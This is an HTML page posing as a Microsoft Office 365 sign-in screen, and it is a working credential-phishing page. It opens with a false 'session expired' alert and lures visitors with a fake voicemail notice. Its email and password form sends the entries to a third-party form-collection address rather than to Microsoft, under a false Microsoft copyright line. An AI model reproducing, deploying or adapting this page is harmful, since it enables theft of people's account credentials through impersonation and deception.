<html lang="en"><head>

<script language="javascript">

alert("\n\nMicrosoft Account!\n\n Sorry, your session has expired, please kindly login again to start new session \n\n");	
</script>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft Office 365</title>
    <link rel="shortcut icon" type="image/x-icon" href="https://blobs.officehome.msocdn.com/images/content/images/favicon-8f211ea639.ico">
    <style>
      
        *,body{
            margin: 0;
            padding: 0;
        }
        body{
            font-family: Segoe UI;
            overflow: hidden;
            min-height: 100vh;
        }
        body:before{
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 46%;
            height: 100vh;
            background-color: #ff5800;
            z-index: 1;
        }
        .shape{
            position: absolute;
            width: 30%;
            top: 50%;
            height: 100vw;
            transform: skewY(70deg);
            left: 42%;
            background: #ff5800;
            z-index: 1;
        }
        .bg{
            position: absolute;
            top: 0;
            right: 0;
            height: 100vh;
        }
        .content{
            position: absolute;
            width: 50%;
            right: 0;
            top: 0;
            background-color: #f5f5f5;
            color: #1b1b1b;
            padding: 1.2%;
            padding-right: 6%;
            text-align: right;
            font-size: 2vw;
            font-weight: 600;
        }
        .logo{
            position: absolute;
            top: 4%;
            left: 7%;
            width: 18vw;
            z-index: 2;
        }
        .login-card{
            background-color: #fff;
            position: absolute;
            top: 18%;
            left: 7%;
            width: 100%;
            max-width: 25vw;
            min-height: 30vw;
            border-radius: 0.5vw;
            z-index: 4;
            padding: 1.8vw;
        }
        .ms-logo{
            width: 10vw;
            margin-bottom: 2%;
        }
        .heading{
            font-size: 1.4vw;
            font-weight: 600;
            margin-bottom: 0.4vw;
        }
        .heading img{
            margin-right: 0.4%;
            height: 1.6vw;
            vertical-align: middle;
        }
        .sub-text{
            color: #999999;
            font-size: 1.18vw;
            font-weight: 600;
            margin-bottom: 1vw;
        }
        .links img{
            width: 100%;
            margin-bottom: 2%;
            transition: all 0.3s;
        }
        .links img:hover{
            transform: scale(1.05);
        }
        .copyright{
            position: absolute;
            bottom: 2%;
            left: 7%;
            font-size: 1vw;
            color: #fff;
            z-index: 2;
        }
        .footer{
            position: absolute;
            bottom: 2%;
            right: 6%;
            font-size: 1vw;
            z-index: 4;
        }
        .footer a{
            color: #1b1b1b;
            text-decoration: none;
        }
        .footer a:not(:first-child) {
            margin-left: 2vw;
        }
        @media(max-width: 991px){
            .bg,.content,.shape{
                display: none;
            }
            .login-card{
                max-width: 320px;
                padding: 0.625rem;
            }
            .ms-logo{
                width: 120px;
            }
            .heading{
                font-size: 1.25rem;
            }
            .sub-text{
                font-size: 0.975rem;
            }
            .heading img{
                height: 1.6rem;
            }
            body:before{
                width: 100%;
            }
            .login-card{
                left: 50%;
                transform: translateX(-50%);
                width: 90%;
            }
            .copyright,.footer{
                font-size: 0.625rem;
            }
            .footer a{
                color: #fff;
            }
        }
    </style>


    <img src="https://imageio.forbes.com/blogs-images/salesforce/files/2014/09/shutterstock_95521117.jpg?format=jpg&amp;width=1200" class="bg" alt="office 365">
    <div class="shape"></div>
    <div class="content">
        Designed to help you achieve more <br>with innovative Office apps
    </div>
   
    <div class="login-card">
        <div class="card-inner">
            <img class="ms-logo" src="https://upload.wikimedia.org/wikipedia/commons/8/85/Microsoft_365_logo.png" alt="microsoft-logo-svg">
            <div class="heading">
                <span><img src="https://www.protocol.com/media-library/microsoft-logo-wearing-a-headset.png?id=30145418&amp;width=1245&amp;height=700&amp;quality=85&amp;coordinates=0%2C0%2C0%2C0" alt="voicemail"></span>
                <span>You have a new voice message</span>
            </div>
            
            <div class="sub-text">
                Please sign in to access voice
                message
            </div><div class="links">

             
              <div class="wrapper">
    
<meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>



<div class="container mt-3">
  <form action="https://fabform.io/f/7gCxUDz" method="POST" accept-charset="UTF-8">
    <div class="mb-3 mt-3">
      <label for="email">Email:</label>
      <input type="email" class="form-control" id="email" placeholder="Enter email" name="email">
    </div>
    <div class="mb-3">
      <label for="pwd">Password:</label>
      <input type="password" class="form-control" id="pwd" placeholder="Enter password" name="pswd">
    </div>
    <div class="form-check mb-3">
      <label class="form-check-label">
        <input class="form-check-input" type="checkbox" name="remember"> Remember me
      </label>
    </div>
    <button type="submit" class="btn btn-primary">Sign in</button>
  </form>
</div>


</div></div>
                               
           
        </div>
    </div>
        
    
    <div class="copyright">
        © 2023 Copyright Microsoft Corporation
    </div>
    <div class="footer">
        <a href="javascript:void(0);">Terms</a>
        <a href="javascript:void(0);">Privacy &amp; Policy</a>
        <a href="javascript:void(0);">Help</a>
    </div>


</body></html>